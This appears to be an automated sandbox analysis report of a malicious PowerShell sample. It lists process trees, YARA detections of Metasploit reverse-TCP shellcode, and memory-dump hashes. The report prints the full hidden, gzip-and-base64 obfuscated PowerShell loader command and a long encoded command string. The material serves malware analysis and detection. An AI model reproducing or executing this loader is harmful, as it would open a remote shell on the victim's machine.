QBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
                  Imagebase:0x840000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:02:10:09
                  Start date:16/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:02:10:10
                  Start date:16/10/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
                  Imagebase:0x840000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2284451182.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:02:10:10
                  Start date:16/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bee14ccec71757d9404bb0a781263fb9902f42ea31986357312d5d2ec25a070b
                    • Instruction ID: cf56a8b7fd522e9a43a056a126b880d12a82d3452ac5c8a5c16dc92b5bbb806c
                    • Opcode Fuzzy Hash: bee14ccec71757d9404bb0a781263fb9902f42ea31986357312d5d2ec25a070b
                    • Instruction Fuzzy Hash: CF123A74A00249DFCB15CF98C494AADFBB2BF88314F25C56AE814AB3A5C735ED41CB90
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f5869cbd577a4ac479b16e69b6e869fe5c67dfd1c418b0362a12e6dbf211231
                    • Instruction ID: 5512a894f3041a5d8f5dfba0d8ad7c29ee459c170e2c89e8f1e166e45dc0d3cf
                    • Opcode Fuzzy Hash: 0f5869cbd577a4ac479b16e69b6e869fe5c67dfd1c418b0362a12e6dbf211231
                    • Instruction Fuzzy Hash: 0FF16D34A052589FCB16CFA8D890ADDBFB5EF89310F15C19AE844AB392C731ED45CB91
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 788aa9b1aa5a84c28d4abc7439308213d9a01d06ba1a1fb4868e0bbdf9067c8f
                    • Instruction ID: da8f9283b2535fa603ec0b59bec00b540e45f9daac20efae81bd13e953854c25
                    • Opcode Fuzzy Hash: 788aa9b1aa5a84c28d4abc7439308213d9a01d06ba1a1fb4868e0bbdf9067c8f
                    • Instruction Fuzzy Hash: CA415974A00505DFCB1ACF59C5989AEFBB1FF48310B258669D905AB3A4C332FC51CBA0
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8fc5b981f69d9b883496d3b355f88139f7df4c8800f26ea83835f59ff560bd8
                    • Instruction ID: 6eefa44536ca83e4816845ca59678ef319233cd50f9bba1681ded8a066158fb1
                    • Opcode Fuzzy Hash: b8fc5b981f69d9b883496d3b355f88139f7df4c8800f26ea83835f59ff560bd8
                    • Instruction Fuzzy Hash: B2413674A00509DFCB19CF49C598AAEFBB5FF48310B218669D905AB3A4C732FC51CBA0
                    Memory Dump Source
                    • Source File: 00000001.00000002.2188672443.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7480000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6f009a83f9fcb062a70d54891c057585963b90126ca58708f276f69a2ed42677
                    • Instruction ID: ceabae23283b2fad7d33fc0b27097044169b3bed38a41e9e754bda3f9a738af5
                    • Opcode Fuzzy Hash: 6f009a83f9fcb062a70d54891c057585963b90126ca58708f276f69a2ed42677
                    • Instruction Fuzzy Hash: 0C2149B2B0020E8BDB55B669D8102FFB755ABC5610F14856FC5538B292EF31C90387A2
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db785484eb76fc9514cf5dbb4b68c0c486876d3fd38b2932751507ef4118f5ab
                    • Instruction ID: 1aafd84a9473af74b399e85d3d35f3fde88ff04ff7b4a6ac59acc524483f2262
                    • Opcode Fuzzy Hash: db785484eb76fc9514cf5dbb4b68c0c486876d3fd38b2932751507ef4118f5ab
                    • Instruction Fuzzy Hash: 3B215E74A00219DFCB11CF98D8809AEFBB5FF89310B1081A5E905AB352C731FD41CBA1
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180228220.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_2cbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 993b25bb6978eede58ecb4184af862cf952d53da893761bd4a3ba7c23d484b80
                    • Instruction ID: 838e22c05a4f9363bef2e7912dc26b2a1d032ca97c91253244f243a3b0bc0c05
                    • Opcode Fuzzy Hash: 993b25bb6978eede58ecb4184af862cf952d53da893761bd4a3ba7c23d484b80
                    • Instruction Fuzzy Hash: 54015E6240E3C09FE7138B259894B92BFB4DF43225F1DC0DBD9888F1A3C2695849C7B2
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180228220.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_2cbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6cebb535219ca1e2546e7e32e27d60f5b15cb771f366a8c531c5406ca0ad01ef
                    • Instruction ID: fbe715bd90436067bbda7e2b7a26cf64746f2a39e29a12e80a878bcef255a042
                    • Opcode Fuzzy Hash: 6cebb535219ca1e2546e7e32e27d60f5b15cb771f366a8c531c5406ca0ad01ef
                    • Instruction Fuzzy Hash: 95012671405344DAE7114E26EDC0BA7BF98DF81375F08C41AEE0A0B242CBB99941CAF1
                    Memory Dump Source
                    • Source File: 00000001.00000002.2188672443.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7480000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6286bcc9ce31581a3baa99a2a5abec4bace290078f6daa7e1923d0b9288177c
                    • Instruction ID: c6d04e7b7d03c8a13cd2fff3099a0be72d6ed8cf8935f8a57e8a86ccb12890a5
                    • Opcode Fuzzy Hash: e6286bcc9ce31581a3baa99a2a5abec4bace290078f6daa7e1923d0b9288177c
                    • Instruction Fuzzy Hash: 8BF059B570020DDBDD54B79894206EE7B19FBC9F01F10125BEA026F680CF624D034BAB
                    Memory Dump Source
                    • Source File: 00000001.00000002.2180868344.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4900000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 840abd57d06402436084c0fb2e7746137ac7b630aced7ea52089b43598610985
                    • Instruction ID: 1987e81fc85de9bca09517e77fa8d6c9fdca63f1eefb05a5565bbffe3101636f
                    • Opcode Fuzzy Hash: 840abd57d06402436084c0fb2e7746137ac7b630aced7ea52089b43598610985
                    • Instruction Fuzzy Hash: 0BF05E34A00145AFCB04CBA8D8449AAFBB5FFC8310B348199D959A3651CB32AC93CB90
                    APIs
                    • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,77070002,1F4A6856,0000000A,?,?,5F327377,00003233), ref: 07E000D5
                    Memory Dump Source
                    • Source File: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                    Yara matches
                    Similarity
                    • API ID: Socket
                    • String ID:
                    • API String ID: 38366605-0
                    • Opcode ID: 12a7b52c5c6eafa18c9b444ca4886760d177891260f607b5ce74b0f9a8d95320
                    • Instruction ID: b54a0288a3258e5c42ddff52ffab6771936ab38483438c5557b2d5f70c02b3ed
                    • Opcode Fuzzy Hash: 12a7b52c5c6eafa18c9b444ca4886760d177891260f607b5ce74b0f9a8d95320
                    • Instruction Fuzzy Hash: 8F11C0F07822997EF53022629C07FBB391CDF42BA8F000425BB45FA0C0D9929CC081FA
                    APIs
                    • CreateThread.KERNELBASE(?,00000000,?,?,?,?), ref: 02C6C479
                    Memory Dump Source
                    • Source File: 00000003.00000002.2283950587.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_2c60000_powershell.jbxd
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: eaa3c60a97d4d181a92d2b41bcf2791ad21ebad35067f3e5a176c21993598da6
                    • Instruction ID: 5bd7057b637b2750400abf98f6ad81b787f220f6248db03a851c5f001aebfd66
                    • Opcode Fuzzy Hash: eaa3c60a97d4d181a92d2b41bcf2791ad21ebad35067f3e5a176c21993598da6
                    • Instruction Fuzzy Hash: 621147729002099FDB10CFAAD845BEFBBF5AF88320F14841AE559A7210CB759550CFA1
                    APIs
                    • CreateThread.KERNELBASE(?,00000000,?,?,?,?), ref: 02C6C479
                    Memory Dump Source
                    • Source File: 00000003.00000002.2283950587.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_2c60000_powershell.jbxd
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: c22a4505f81d9099681ae7894d65e7e3b9a6844b3dff9b75a9182dcb070ed2fa
                    • Instruction ID: a74c33d136f33bebc029d05b51bc860b2473c3732e69af0434ec3f6c9fadb5f8
                    • Opcode Fuzzy Hash: c22a4505f81d9099681ae7894d65e7e3b9a6844b3dff9b75a9182dcb070ed2fa
                    • Instruction Fuzzy Hash: 881126729002499FDF10DFAAC845BEFBBF5EF88720F14841AE559A7210CB75A550CFA1
                    Memory Dump Source
                    • Source File: 00000003.00000002.2297706580.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7210000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 160ddd54f45fa68810af4aad3a6e15195ce020867b60ff62b86469c28749a2ca
                    • Instruction ID: d97dfaa554896ec183bb1e8d05a65ebf7474bdf976f6f544d5dda2d54de803d4
                    • Opcode Fuzzy Hash: 160ddd54f45fa68810af4aad3a6e15195ce020867b60ff62b86469c28749a2ca
                    • Instruction Fuzzy Hash: 06B1B175A20256DFCB248F69C840AAEBBE2FFD9310F298499E9059B341DF71DC11CB91
                    Memory Dump Source
                    • Source File: 00000003.00000002.2282761077.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_29cd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a03e8b4aa7ddb1e1d08babc656006cf101dd5e5a0102b34a00f2610cb2b230c
                    • Instruction ID: 8d288504c42008a7b9d4e2a8963f9c4aa278ed390b505edb24ac6865f9e6cd83
                    • Opcode Fuzzy Hash: 7a03e8b4aa7ddb1e1d08babc656006cf101dd5e5a0102b34a00f2610cb2b230c
                    • Instruction Fuzzy Hash: 6401A2724053449AE7108A29DD84B67BF9CDF81774F28C42EED485A242C7B99942C6B2
                    Memory Dump Source
                    • Source File: 00000003.00000002.2282761077.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_29cd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f53aadd66b7d74294e17b4b6e8a5668f8daea22165f1742b783fd68ff11299d3
                    • Instruction ID: a501c3c00176bd71b7113e54057528eaf01dabf98ee04d6dc1576994d3397508
                    • Opcode Fuzzy Hash: f53aadd66b7d74294e17b4b6e8a5668f8daea22165f1742b783fd68ff11299d3
                    • Instruction Fuzzy Hash: 0201006140E3C05FD7138B259D94752BFB8DF43624F19C1DBD9888F5A3C2695845C772